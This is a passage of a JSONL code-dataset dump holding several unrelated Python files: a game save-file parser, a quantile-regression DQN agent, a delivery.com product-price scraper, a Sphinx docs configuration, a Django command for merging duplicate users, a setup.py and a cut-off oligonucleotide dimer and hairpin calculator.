memberIsFounder = member.find('IsFounder')\n memberList['playerId'] = memberPlayerID.text\n memberList['isLeader'] = memberIsLeader.text\n memberList['IsFounder'] = memberIsFounder.text\n faction['memberList'] = memberList\n self.factions[factionID.text] = faction\n del faction\n\n # end def __init__ for sbc\n\n def getPlayerDict(self):\n return self.playerDict\n\n def get_world_users(self):\n return self.playerDict\n\n def get_world(self):\n return self.world\n\n def getSettings(self):\n return self.settings\n\n def get_mods(self):\n return 
self.mods\n","sub_path":"Sbc.py","file_name":"Sbc.py","file_ext":"py","file_size_in_byte":5365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"417631280","text":"\nimport torch.nn as nn\nimport torch\nimport numpy as np\nimport collections\n\nfrom dopamine.agents.dqn.dqn import DQNAgent\n\n\ndef huber(x, k=1.0):\n return torch.where(x.abs() < k, 0.5 * x.pow(2), k * (x.abs() - 0.5 * k))\n\ndef get_network_type():\n \"\"\"Returns the type of the outputs of a Q value network.\n\n Returns:\n net_type: the outputs of the network.\n \"\"\"\n return collections.namedtuple('DQN_network', ['q_values', 'logits'])\n\n\nclass NetWork(nn.Module):\n\n def __init__(self, len_state, num_quant, num_actions):\n nn.Module.__init__(self)\n\n self.num_quant = num_quant\n self.num_actions = num_actions\n\n self.layer1 = nn.Linear(len_state, 256)\n self.layer2 = nn.Linear(256, num_actions * num_quant)\n\n def forward(self, x):\n x = self.layer1(x)\n x = torch.tanh(x)\n x = self.layer2(x)\n logits = x.view(-1, self.num_actions, self.num_quant)\n return get_network_type()(logits.mean(2), logits)\n\n\nclass QuantileRegAgent(DQNAgent):\n \"\"\"An implementation fo the Quantile Regression DQN agent\"\"\"\n\n def __init__(self,\n num_actions,\n len_state,\n num_quant=2,\n net=NetWork,\n gamma=0.99,\n memory_size=10000,\n batch_size=32,\n learning_start=1000,\n update_period=1,\n target_update_period=500,\n epsilon_start=1.0,\n epsilon_train_final=0.01,\n epsilon_decay_period=10000,\n torch_device='cpu'):\n\n \"\"\"Initializes the agent.\n\n Args:\n num_actions: int, number of actions the agent can take at any state.\n len_state: int, the size of the state.\n net: define your net work model.\n gamma: float, discount factor with the usual RL meaning.\n memory_size: int, the capacity of the replay buffer.\n batch_size: int, the number you want to sample from replay buffer every \n train step\n learning_start: int, number of transitions that should be experienced\n before the agent begins training its value function.\n update_period: int, period between DQN updates.\n target_update_period: int, update period for the target network.\n epsilon_train: float, the value to which the agent's epsilon is eventually\n decayed during training.\n epsilon_decay_period: int, length of the epsilon decay schedule.\n torch_device: str, Tensorflow device on which the agent's graph is executed.\n \"\"\"\n self._num_quant = num_quant\n self._tau = torch.Tensor((2 * np.arange(num_quant) + 1) / (2.0 * num_quant)).view(1, -1)\n\n super(QuantileRegAgent, self).__init__(\n num_actions=num_actions,\n len_state=len_state,\n net=net,\n gamma=gamma,\n memory_size=memory_size,\n batch_size=batch_size,\n learning_start=learning_start,\n update_period=update_period,\n target_update_period=target_update_period,\n epsilon_start=epsilon_start,\n epsilon_train_final=epsilon_train_final,\n epsilon_decay_period=epsilon_decay_period,\n torch_device=torch_device\n )\n\n\n def _build_net(self):\n \"\"\"Builds the Q-value network computations needed for acting and training.\"\"\"\n self._net = self._network(self._len_state, self._num_quant, self._num_actions).to(self._device)\n self._target_net = self._network(self._len_state, self._num_quant, self._num_actions).to(self._device)\n\n def _update_net(self, batch):\n \"\"\"Perform one step training from replay buffer and update net's params\"\"\"\n s_batch, a_batch, r_batch, s2_batch, t_batch = batch\n s_batch = torch.stack(s_batch)\n s2_batch = 
torch.stack(s2_batch)\n a_batch = torch.cat(a_batch)\n r_batch = torch.cat(r_batch).view(-1, 1)\n t_batch = torch.cat(t_batch).view(-1, 1)\n\n s_batch = s_batch.type(dtype=torch.float32)\n s2_batch = s2_batch.type(dtype=torch.float32)\n a_batch = a_batch.type(dtype=torch.long)\n t_batch = t_batch.type(dtype=torch.float32)\n\n theta = self._net(s_batch).logits[np.arange(self._batch_size), a_batch]\n next_logits = self._target_net(s2_batch).logits.detach()\n theta_next = next_logits[np.arange(self._batch_size), next_logits.mean(2).max(1)[1]]\n theta_target = self._gamma * theta_next * (1 - t_batch) + r_batch\n\n diff = theta_target.t().unsqueeze(-1) - theta\n loss = huber(diff) * (self._tau - (diff.detach() < 0).float()).abs()\n loss = loss.mean()\n\n self._optimizer.zero_grad()\n\n loss.backward()\n for param in self._net.parameters():\n param.grad.data.clamp_(-1, 1)\n self._optimizer.step()\n\n\n","sub_path":"dopamine/agents/dqn/quantile_reg_dqn.py","file_name":"quantile_reg_dqn.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"382597000","text":"import os\nimport os.path as op\nimport re\n\nfrom lxml import etree\n\nparser = etree.HTMLParser(encoding='utf-8')\nfrom time import sleep\nfrom urllib.parse import urlsplit, parse_qs\nimport requests_cache\n\nfrom validators import validate_raw_files, check_products_detection\nfrom create_csvs import create_csvs\nfrom ers import all_keywords_usa as keywords, fpath_namer, mh_brands, clean_url, shop_inventory_lw_csv\n\nfrom matcher import BrandMatcher\nfrom ers import COLLECTION_DATE, file_hash, img_path_namer, TEST_PAGES_FOLDER_PATH\nfrom custom_browser import CustomDriver\nfrom parse import parse\nfrom ers import clean_xpathd_text\n\n\n# Init variables and assets\nshop_id = 'delivery_com'\nroot_url = 'https://www.delivery.com'\nrequests_cache.install_cache(fpath_namer(shop_id, 'requests_cache'))\ncountry = 'USA'\n\nsearches, categories, products = {}, {}, {}\ndriver = CustomDriver(headless=True)\nbrm = BrandMatcher()\n\n\ndef getprice(pricestr):\n pricestr = re.sub(\"[^0-9.$]\", \"\", pricestr)\n if pricestr == '':\n return pricestr\n price = parse('${pound:d}.{pence:d}', pricestr)\n if price is None:\n price = parse('{pence:d}p', pricestr)\n return price.named['pence']\n else:\n return price.named['pound'] * 100 + price.named['pence']\n\n\n# ##################\n# # CTG page xpathing #\n# ##################\nctg_page_test_url = 'https://www.delivery.com/search/alcohol/wine/red?address=NEW%20YORK,%20NY'\nexple_ctg_page_path = op.join(TEST_PAGES_FOLDER_PATH, shop_id, 'ctg_page_test.html') # TODO : store the file\nos.makedirs(op.dirname(exple_ctg_page_path), exist_ok=True)\nctg, test_categories, test_products = '', {'': []}, {}\n\n# driver.get(ctg_page_test_url)\n# driver.save_page(exple_ctg_page_path, scroll_to_bottom=True)\n\n\ndef ctg_parsing(fpath, ctg, categories, products): # TODO : modify xpaths\n tree = etree.parse(open(fpath, 'rb'), parser=parser)\n for li in tree.xpath('//ul[contains(@id ,\"product_list\")]/li'):\n if not li.xpath('.//a/@href'):\n continue\n produrl = li.xpath('.//a/@href')[0]\n produrl = parse_qs(urlsplit(produrl).query)['url'][0] if 'url' in parse_qs(urlsplit(produrl).query) else produrl\n products[produrl] = {\n 'pdct_name_on_eretailer': clean_xpathd_text(li.xpath('.//a[@class=\"product-name\"]/text()')),\n 'volume': clean_xpathd_text(li.xpath('.//p[@class=\"product-desc\"]/text()')),\n 'raw_price': 
clean_xpathd_text(li.xpath('.//div[@class=\"alineacion\"]//text()')[:2]),\n 'raw_promo_price': clean_xpathd_text(li.xpath('./zzzzzzzzzzzz')),\n 'pdct_img_main_url': \"\".join(li.xpath('.//div[@class=\"product-image-container\"]//img/@src')),\n }\n products[produrl]['brnd'] = brm.find_brand(products[produrl]['pdct_name_on_eretailer'])['brand']\n print(products[produrl], produrl)\n products[produrl]['price'] = getprice(products[produrl]['raw_price'])\n products[produrl]['promo_price'] = getprice(products[produrl]['raw_promo_price'])\n products[produrl]['pdct_img_main_url'] = clean_url(products[produrl]['pdct_img_main_url'], root_url)\n print(products[produrl])\n\n categories[ctg].append(produrl)\n return categories, products\n\n\nctg_parsing(exple_ctg_page_path, ctg, test_categories, test_products)\n\n###################\n# # KW page xpathing #\n###################\nsearch_page_test_url = 'https://www.delivery.com/search/alcohol?address=NEW%20YORK,%20NY&keyword=whiskey'\nexple_kw_page_path = op.join(TEST_PAGES_FOLDER_PATH, shop_id, 'kw_page_test.html') # TODO : store the file\nos.makedirs(op.dirname(exple_kw_page_path), exist_ok=True)\nkw_test, test_searches, test_products = 'champagne', {\"champagne\": []}, {}\n\n# driver.get(search_page_test_url.format(kw=kw_test))\n# driver.save_page(exple_kw_page_path, scroll_to_bottom=True)\n\n\ndef kw_parsing(fpath, kw, searches, products): # TODO : modify xpaths\n tree = etree.parse(open(fpath, 'rb'), parser=parser)\n for li in tree.xpath('//ul[contains(@id ,\"product_list\")]/li'):\n if not li.xpath('.//a/@href'):\n continue\n produrl = li.xpath('.//a/@href')[0] # '.' keeps the XPath relative to this li (the absolute '//a/@href' returned the page's first link for every item)\n produrl = parse_qs(urlsplit(produrl).query)['url'][0] if 'url' in parse_qs(urlsplit(produrl).query) else produrl\n products[produrl] = {\n 'pdct_name_on_eretailer': clean_xpathd_text(li.xpath('.//a[contains(@id, \"ProductTitleLink\")]/text()')),\n 'volume': clean_xpathd_text(li.xpath('.//a[contains(@id, \"ProductTitleLink\")]//text()')),\n 'raw_price': clean_xpathd_text(li.xpath('.//div[@class=\"alineacion\"]//text()')[:2]),\n 'raw_promo_price': clean_xpathd_text(li.xpath('./zzzzzzzzzz')),\n 'pdct_img_main_url': \"\".join(li.xpath('.//div[@class=\"product-image-container\"]//img/@src')),\n }\n products[produrl]['brnd'] = brm.find_brand(products[produrl]['pdct_name_on_eretailer'])['brand']\n print(products[produrl], produrl)\n products[produrl]['price'] = getprice(products[produrl]['raw_price'])\n products[produrl]['promo_price'] = getprice(products[produrl]['raw_promo_price'])\n products[produrl]['pdct_img_main_url'] = clean_url(products[produrl]['pdct_img_main_url'], root_url)\n print(products[produrl])\n\n searches[kw].append(produrl)\n return searches, products\n\n\nkw_parsing(exple_kw_page_path, kw_test, test_searches, test_products)\n\n###################\n# # PDCT page xpathing #\n###################\nexple_pdct_page_path = op.join(TEST_PAGES_FOLDER_PATH, shop_id, 'pdct_page_test.html') # TODO: store the file\n# exple_pdct_page_path = \"/code/mhers/cache/w_9/isetan/pdct/<クリュッグ>ロゼ ハーフサイズ-page0.html\"\ntest_url, test_products = '', {'': {}}\n\n\ndef pdct_parsing(fpath, url, products): # TODO : modify xpaths\n tree = etree.parse(open(fpath), parser=parser)\n products[url].update({\n 'volume': clean_xpathd_text(tree.xpath('(//div[@class=\"col-xs-6 col-sm-12 nopadding pull-right\"]//text())[23]')),\n 'pdct_img_main_url': clean_url(''.join(tree.xpath('//span[@id=\"view_full_size\"]//img/@src')), root_url),\n 'ctg_denom_txt': ' '.join(tree.xpath('//div[@class=\"breadcrumb 
clearfix\"]//text()')),\n })\n return products\n\npdct_parsing(exple_pdct_page_path, test_url, test_products)\n\n###################\n# # CTG scrapping #\n###################\n\nurls_ctgs_dict = {\n 'whisky': 'https://www.delivery.com/search/alcohol/liquor/whiskey?address=NEW%20YORK,%20NY',\n 'champagne': 'https://www.delivery.com/search/alcohol/wine/sparkling?address=NEW%20YORK,%20NY',\n 'cognac': 'https://www.delivery.com/search/alcohol/liquor/brandy-cognac?address=NEW%20YORK,%20NY',\n 'sparkling': 'https://www.delivery.com/search/alcohol/wine/sparkling?address=NEW%20YORK,%20NY',\n 'vodka': 'https://www.delivery.com/search/alcohol/liquor/vodka?address=NEW%20YORK,%20NY',\n# 'still_wines': '',\n 'gin': 'https://www.delivery.com/search/alcohol/liquor/gin?address=NEW%20YORK,%20NY',\n# 'tequila': '',\n 'red_wine': 'https://www.delivery.com/search/alcohol/wine/red?address=NEW%20YORK,%20NY',\n 'white_wine': 'https://www.delivery.com/search/alcohol/wine/white?address=NEW%20YORK,%20NY',\n 'rum': 'https://www.delivery.com/search/alcohol/liquor/rum?address=NEW%20YORK,%20NY',\n 'bourbon': 'https://www.delivery.com/search/alcohol/liquor/featured-liquor?address=NEW%20YORK,%20NY',\n 'brandy': 'https://www.delivery.com/search/alcohol/liquor/brandy-cognac.brandy?address=NEW%20YORK,%20NY',\n 'liquor': 'https://www.delivery.com/search/alcohol/liquor/featured-liquor?address=NEW%20YORK,%20NY',\n}\n\n\n# Category Scraping - with selenium - multiple pages per category (click on next page)\nfor ctg, url in urls_ctgs_dict.items():\n categories[ctg] = []\n number_of_pdcts_in_ctg = 0\n\n for p in range(100):\n fpath = fpath_namer(shop_id, 'ctg', ctg, p)\n\n if not op.exists(fpath):\n driver.get(url.format(page=p+1))\n sleep(2)\n driver.save_page(fpath, scroll_to_bottom=True)\n categories, products = ctg_parsing(fpath, ctg, categories, products)\n\n if len(set(categories[ctg])) == number_of_pdcts_in_ctg:\n break\n else:\n number_of_pdcts_in_ctg = len(set(categories[ctg]))\n print(ctg, url, p, len(categories[ctg]))\n\n\n######################################\n# # KW searches scrapping ############\n######################################\n\n# KW searches Scraping - with requests - one page per search\nkw_search_url = \"\" # TODO : modify URL\nfor kw in keywords:\n searches[kw] = []\n number_of_pdcts_in_kw_search = 0\n if not op.exists(fpath_namer(shop_id, 'search', kw, 0)):\n driver.get(kw_search_url.format(kw=kw, page=1))\n\n for p in range(1):\n fpath = fpath_namer(shop_id, 'search', kw, p)\n if not op.exists(fpath):\n sleep(2)\n driver.smooth_scroll()\n driver.save_page(fpath, scroll_to_bottom=True)\n searches, products = kw_parsing(fpath, kw, searches, products)\n\n print(kw, len(searches[kw]))\n\n######################################\n# # Product pages scraping ###########\n######################################\n\n# Download the pages - with selenium\nfor url in sorted(list(set(products))):\n d = products[url]\n if d['brnd'] in mh_brands:\n print(d['pdct_name_on_eretailer'], d['volume'])\n url_mod = clean_url(url, root_url=root_url)\n\n fpath = fpath_namer(shop_id, 'pdct', d['pdct_name_on_eretailer'], 0)\n if not op.exists(fpath):\n driver.get(url_mod)\n sleep(2)\n driver.save_page(fpath, scroll_to_bottom=True)\n products = pdct_parsing(fpath, url, products)\n print(products[url])\n\n\n######################################\n# # Download images ###########\n######################################\n# Download images\nfrom ers import download_img\n\nfor url, pdt in products.items():\n if 'pdct_img_main_url' in 
pdt and pdt['pdct_img_main_url'] and brm.find_brand(pdt['pdct_name_on_eretailer'])['brand'] in mh_brands:\n print(pdt['pdct_name_on_eretailer'] + \".\" + pdt['pdct_img_main_url'].split('.')[-1])\n orig_img_path = img_path_namer(shop_id, pdt['pdct_name_on_eretailer'])\n img_path = download_img(pdt['pdct_img_main_url'], orig_img_path, shop_id=shop_id, decode_content=False, gzipped=False, debug=False)\n if img_path:\n products[url].update({'img_path': img_path, 'img_hash': file_hash(img_path)})\n\ncreate_csvs(products, categories, searches, shop_id, fpath_namer(shop_id, 'raw_csv'), COLLECTION_DATE)\nvalidate_raw_files(fpath_namer(shop_id, 'raw_csv'))\ncheck_products_detection(shop_id, fpath_namer(shop_id, 'raw_csv'), shop_inventory_lw_csv)\ndriver.quit()\n","sub_path":"spiders/delivery_com_2019.py","file_name":"delivery_com_2019.py","file_ext":"py","file_size_in_byte":10711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"179713078","text":"# -*- coding: utf-8 -*-\n#\n# This file is execfile()d with the current directory set\n# to its containing dir.\n\nimport os\nimport sys\n\ntry:\n import nengo_extras\n import guzzle_sphinx_theme\nexcept ImportError:\n print(\"To build the documentation, nengo_extras and guzzle_sphinx_theme \"\n \"must be installed in the current environment. Please install these \"\n \"and their requirements first. A virtualenv is recommended!\")\n sys.exit(1)\n\nextensions = [\n 'sphinx.ext.autodoc',\n 'sphinx.ext.autosummary',\n 'sphinx.ext.githubpages',\n 'sphinx.ext.intersphinx',\n 'sphinx.ext.mathjax',\n 'sphinx.ext.todo',\n 'sphinx.ext.viewcode',\n 'guzzle_sphinx_theme',\n 'numpydoc',\n 'nengo.utils.docutils',\n 'nbsphinx',\n 'nbsphinx_link',\n]\n\n# -- sphinx.ext.autodoc\nautoclass_content = 'both' # class and __init__ docstrings are concatenated\nautodoc_default_flags = ['members']\nautodoc_member_order = 'bysource' # default is alphabetical\n\n# -- sphinx.ext.intersphinx\nintersphinx_mapping = {\n 'nengo': ('https://www.nengo.ai/nengo/', None),\n 'numpy': ('https://docs.scipy.org/doc/numpy', None),\n 'scipy': ('https://docs.scipy.org/doc/scipy/reference', None),\n}\n\n# -- sphinx.ext.todo\ntodo_include_todos = True\n\n# -- numpydoc\nnumpydoc_show_class_members = False\n\n# -- nbsphinx\nnbsphinx_timeout = -1\n\n# -- sphinx\nexclude_patterns = ['_build']\nsource_suffix = '.rst'\nsource_encoding = 'utf-8'\nmaster_doc = 'index'\n\n# Need to include https Mathjax path for sphinx < v1.3\nmathjax_path = (\"https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.3/\"\n \"config/TeX-AMS-MML_HTMLorMML.js\")\n\nproject = u'Nengo Extras'\nauthors = u'Applied Brain Research'\ncopyright = nengo_extras.__copyright__\nversion = '.'.join(nengo_extras.__version__.split('.')[:2]) # Short X.Y version\nrelease = nengo_extras.__version__ # Full version, with tags\npygments_style = 'default'\n\n# -- Options for HTML output --------------------------------------------------\n\npygments_style = \"sphinx\"\ntemplates_path = [\"_templates\"]\nhtml_static_path = [\"_static\"]\n\nhtml_theme_path = guzzle_sphinx_theme.html_theme_path()\nhtml_theme = \"guzzle_sphinx_theme\"\n\nhtml_theme_options = {\n \"project_nav_name\": \"Nengo extras %s\" % (version,),\n \"base_url\": \"https://www.nengo.ai/nengo-extras\",\n}\n\nhtml_title = \"Nengo extras {0} docs\".format(release)\nhtmlhelp_basename = 'Nengo extras'\nhtml_last_updated_fmt = '' # Suppress 'Last updated on:' timestamp\nhtml_show_sphinx = False\n\n# -- Options for LaTeX output 
-------------------------------------------------\n\nlatex_elements = {\n 'papersize': 'letterpaper',\n 'pointsize': '11pt',\n # 'preamble': '',\n}\n\nlatex_documents = [\n # (source start file, target, title, author, documentclass [howto/manual])\n ('index', 'nengo_extras.tex', html_title, authors, 'manual'),\n]\n\n# -- Options for manual page output -------------------------------------------\n\nman_pages = [\n # (source start file, name, description, authors, manual section).\n ('index', 'nengo_extras', html_title, [authors], 1)\n]\n\n# -- Options for Texinfo output -----------------------------------------------\n\ntexinfo_documents = [\n # (source start file, target, title, author, dir menu entry,\n # description, category)\n ('index', 'nengo_extras', html_title, authors, 'Nengo',\n 'Lesser used features for Nengo', 'Miscellaneous'),\n]\n","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"40975362","text":"import shortuuid\nfrom allauth.account.models import EmailAddress\nfrom django.core.management.base import BaseCommand\nfrom django.db import transaction\nfrom django_super_deduper.merge import MergedModelInstance\n\nfrom accounts.models import Account\nfrom projects.models.projects import Project\nfrom users.models import User\n\n\nclass Command(BaseCommand):\n \"\"\"\n A management command to merge users.\n\n This may be necessary when a user has signed in using different methods\n e.g. using Google and username/password. There are some mechanisms to\n avoid duplication in these instances. But this script allows for de-duplication\n where this has not been successful.\n\n Use with caution, testing and checking!\n\n Example usage:\n\n # Merge users \"foo\" and \"bar\" into user \"baz\"\n ./venv/bin/python3 manage.py merge_users baz foo bar\n \"\"\"\n\n help = \"Merges users for de-duplication purposes.\"\n\n def add_arguments(self, parser):\n \"\"\"\n Add arguments for this command.\n \"\"\"\n parser.add_argument(\n \"primary_username\", type=str, help=\"The user to merge other user data into.\"\n )\n parser.add_argument(\n \"secondary_usernames\",\n nargs=\"+\",\n type=str,\n help=\"The other users to merge into the primary user.\",\n )\n\n @transaction.atomic\n def handle(self, *args, **options):\n \"\"\"\n Handle the command (ie. execute it).\n \"\"\"\n primary_username = options[\"primary_username\"]\n secondary_usernames = options[\"secondary_usernames\"]\n\n self.stdout.write(\n self.style.WARNING(\n \"Are you sure you want to merge users {secondary} into user {primary}? \"\n \"This will delete {secondary}. 
(y/n)\".format(\n primary=primary_username, secondary=\", \".join(secondary_usernames)\n )\n )\n )\n if input(\"> \") != \"y\":\n self.stdout.write(self.style.WARNING(\"Cancelled.\"))\n return\n\n # To avoid clashes in project names (which will cause them to be dropped)\n # check for duplicate project names attached to the users personal account\n # and append a unique string to any duplicates\n existing_names = Project.objects.filter(\n account__user__username=primary_username\n ).values_list(\"name\", flat=True)\n secondary_projects = Project.objects.filter(\n account__user__username__in=secondary_usernames\n )\n for project in secondary_projects:\n if project.name in existing_names:\n project.name += \"-\" + shortuuid.ShortUUID().random(length=8)\n project.save()\n\n # Merge the users' personal accounts\n primary_account = Account.objects.get(user__username=primary_username)\n secondary_accounts = Account.objects.filter(\n user__username__in=secondary_usernames\n )\n MergedModelInstance.create(\n primary_account, secondary_accounts, keep_old=False,\n )\n\n # To avoid a user having more than one primary email, set all emails\n # for secondary users to primary=False\n EmailAddress.objects.filter(user__username__in=secondary_usernames).update(\n primary=False\n )\n\n # Merge the users\n primary_user = User.objects.get(username=primary_username)\n secondary_users = User.objects.filter(username__in=secondary_usernames)\n MergedModelInstance.create(primary_user, secondary_users, keep_old=False)\n\n self.stdout.write(self.style.SUCCESS(\"Succeeded.\"))\n","sub_path":"manager/users/management/commands/merge_users.py","file_name":"merge_users.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"80276682","text":"import os\r\nimport fnmatch\r\nfrom setuptools import find_packages, setup\r\nfrom setuptools.command.build_py import build_py as build_py_orig\r\n\r\n# modules to exclude\r\nexcluded = ['afcpy/myutils.py']\r\n\r\nclass build_py(build_py_orig):\r\n \"\"\"\r\n determines which modules to include or exclude\r\n \r\n source: https://stackoverflow.com/questions/35115892/how-to-exclude-a-single-file-from-package-with-setuptools-and-setup-py\r\n \"\"\"\r\n \r\n def find_package_modules(self, package, package_dir):\r\n modules = super().find_package_modules(package, package_dir)\r\n return [(pkg, mod, file) for (pkg, mod, file) in modules if not any(fnmatch.fnmatchcase(file, pat=pattern) for pattern in excluded)]\r\n \r\ndef generate_manifest():\r\n \"\"\"\r\n generates the manifest file\r\n \"\"\"\r\n \r\n pkg_dir = os.path.abspath(find_packages()[0])\r\n data_dir = os.path.join(pkg_dir,'data')\r\n data_files = []\r\n \r\n for root,folders,files in os.walk(data_dir):\r\n for file in files:\r\n afp = os.path.join(root,file)\r\n rfp = 'afcpy/data'+afp.split('afcpy/data')[-1]\r\n if file.startswith('tb'):\r\n data_files.append(rfp)\r\n elif file == 'log.xlsx':\r\n log_file = rfp\r\n else:\r\n continue\r\n \r\n src_dir = os.path.dirname(os.path.abspath(find_packages()[0]))\r\n manifest = os.path.join(src_dir,'MANIFEST.in')\r\n \r\n with open(manifest,'w') as fopen:\r\n for data_file in data_files:\r\n fopen.write('include {}\\n'.format(data_file))\r\n fopen.write('include {}\\n'.format(log_file))\r\n\r\ndef collect_dependencies():\r\n \"\"\"\r\n collects the dependencies from the requirements.txt file\r\n \"\"\"\r\n \r\n pkg_dir = os.path.abspath(find_packages()[0])\r\n git_dir = 
os.path.dirname(pkg_dir)\r\n req_file = os.path.join(git_dir,'requirements.txt')\r\n \r\n with open(req_file) as req_file_open:\r\n dependencies = [line.rstrip('\\n') for line in req_file_open.readlines()]\r\n \r\n return dependencies\r\n\r\n# generate the manifest\r\ngenerate_manifest()\r\n \r\n# collect the dependencies\r\ndependencies = collect_dependencies() \r\n\r\n# run setup\r\nsetup(name='afcpy',\r\n version=\"1.0.2\",\r\n author='Josh Hunt',\r\n author_email='hunt.brian.joshua@gmail.com',\r\n description=\"\",\r\n url=\"https://github.com/jbhunt/afcpy\",\r\n cmdclass={'build_py': build_py},\r\n packages=find_packages(),\r\n include_package_data=True,\r\n install_requires=dependencies,\r\n classifiers=[\"Programming Language :: Python :: 3\",\r\n \"License :: OSI Approved :: MIT License\",\r\n \"Operating System :: OS Independent\",\r\n ],\r\n )\r\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"353361083","text":"#!/usr/bin/env python3\nfrom OligoCalc import Input\nfrom OligoCalc import Start\nfrom OligoCalc import MakeComplement\nfrom sys import argv\n# from datetime import datetime\n\n\n# GLOBALS\n\ndebugHairpin = 0\ndebugDimers = 0\ndoTiming = 0\ntheAlignedArray = 0\ntheHairpinArray = 0\nminAlignLen = 0\nminHairpinLen = 0\nmaxMismatchNum = 1\n# hairpins must have this many bases between self-annealed sequences\nbubbleSize = 3\n\n\ndef calcDegeneratePrimers(theOligo, theComplement):\n if (not theOligo.hasIUpacBase):\n return\n\n global broadMatch\n broadMatch = True # True: do all degenerate comparisons\n calculateMatrices(theOligo, theComplement)\n # anchorString = \"-----------------------------
<BR>-----------------------------<BR><\/FONT>\"\n # doc.write(anchorString.anchor(\"allMatches\"))\n\n # doc.write(\"Your oligo contains degenerated bases.<BR>\")\n # doc.write(\"This section displays all potential matches <\\/FONT>in the case of degenerated bases.<BR>\")\n # doc.write(\"For Example:<PRE>   'N' matches 'A','T','G','C', or 'N';<BR>'R' matches 'T','C','S','N';<BR>'W' matches 'A','T','W','N'; etc.<\\/PRE><BR><BR>\")\n # hrefString = \"view strict matches only\"\n # doc.writeln(\n # \"Scroll up to view strict Matches<\\/a> <\\/FONT>\")\n\n # if (!isCompatible) {\n # doc.write(\"<BR><B>Sorry, the hairpin loop calculation is only available if you are using IE or Netscape 4.x or higher!!\\n<\/B><BR>\")\n # } else {\n # doc.writeln(displayHairpin(theHairpinArray, theOligo.Sequence))\n # }\n print(display3EndDimer(theOligo, theAlignedArray))\n print(displayAllDimers(theAlignedArray, theOligo.Sequence, theOligo.revSequence))\n\n\ndef calculateMatrices(theOligo, theComplement):\n # var theStart = datetime.now()\n if (len(theOligo.Sequence) != len(theComplement.Sequence)):\n raise ValueError(\n \"Error! Primer and its complement are different lengths!\")\n\n # setup d*d matrix\n matrix = makeMatrix(len(theOligo.Sequence))\n\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calculateMatrices - makeMatrix took \" + (theEnd - theStart) + \" ms<BR>\")\n # theStart = datetime.now()\n\n # //populates the matrix\n\n fillMatchMatrix(theOligo.seqArray, theComplement.seqArray, matrix)\n\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calculateMatrices - fillMatchMatrix took \" + (theEnd - theStart) + \" ms<BR>\")\n # theStart = datetime.now()\n\n # if (isIE)\n # if (theAlignedArray) delete theAlignedArray\n\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calculateMatrices - delete theAlignedArray took \" + (theEnd - theStart) + \" ms<BR>\")\n # theStart = datetime.now()\n # //examine the matrix for 3 prime complementarity\n\n global theAlignedArray\n global maxMismatchNum\n global minAlignLen\n theAlignedArray = makeAlignedArray(matrix, minAlignLen, maxMismatchNum)\n\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calculateMatrices - makeAlignedArray took \" + (theEnd - theStart) + \" ms<BR>\")\n # theStart = datetime.now()\n # delete matrix\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calculateMatrices - delete matrix took \" + (theEnd - theStart) + \" ms<BR>\")\n # theStart = datetime.now()\n # theAlignedArray = sortAlignedArray(theAlignedArray)\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calculateMatrices - sortAlignedArray took \" + (theEnd - theStart) + \" ms<BR>\")\n # theStart = datetime.now()\n # //examine the sequence for potential hairpins\n # if (isCompatible) {\n # if (isIE)\n # if (theHairpinArray) delete theHairpinArray\n # theHairpinArray = calcHairpin(theOligo.Sequence, minHairpinLen)\n # }\n global theHairpinArray\n global minHairpinLen\n theHairpinArray = calcHairpin(theOligo.Sequence, minHairpinLen)\n\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calculateMatrices - calcHairpin took \" + (theEnd - theStart) + \" ms<BR>\")\n\n\ndef calcHairpin(theFullSequence, minHairpinLength):\n # /* compare theCompSeq with theFullSeq starting at theFullSeq[startPos]. Successful matches must be at least minMatch long */\n # /* The resulting array is an array of arrays. each result should be an array of 4 integers\n # result[0]: position of start of match in sequence\n # result[1]: position of end of match\n # result[2]: position of the start of the complement(really the end since it would be 3'-5')\n # result[3]: position of the end of the complement(really the start since it would be 3'-5')\n # */\n\n theFullComplement = MakeComplement(theFullSequence, True)\n theResults = []\n\n # if (debugHairpin) primerWin.document.write(\"<BR><PRE>\")\n # if (debugHairpin) primerWin.document.write(\"calcHairpin: theFullSequence  =\" + theFullSequence + \"; theFullSequence.length=\" + theFullSequence.length + \"; minHairpinLen=\" + minHairpinLen + \";<BR>\")\n # if (debugHairpin) primerWin.document.write(\"calcHairpin: theFullComplement=\" + theFullComplement + \"; theFullComplement.length=\" + theFullComplement.length + \";<BR>\")\n\n theResult = None\n # count = None\n compPos = None\n seqPos = None\n\n # // makes sure that we do not anneal the full length of the primer - that should come out in the dimerization report\n maxSeqLength = abs(len(theFullSequence) // 2) - bubbleSize\n maxMatch = 0\n\n # console.log(maxSeqLength)\n\n for compPos in range(len(theFullComplement) - 2 * minHairpinLength):\n maxMatch = 0\n for seqPos in range(len(theFullSequence) - maxSeqLength):\n # if (debugHairpin) primerWin.document.write(\"calcHairpin: compPos=\" + compPos + \"; seqPos=\" + seqPos + \";<BR>\")\n theResult = getIndexOf(\n theFullSequence[0:seqPos + maxSeqLength],\n theFullComplement[compPos:len(theFullComplement)],\n seqPos, minHairpinLength)\n if (theResult[0] > -1):\n # // theResult[0] is the index of the first match of theFullComplement that is of at least length minHairpinLength in theFullSequence\n # // theResult[1] is the length of the match\n\n theResults = DoHairpinArrayInsert(\n theResult[0],\n theResult[0] + theResult[1] - 1,\n len(theFullSequence) - compPos - 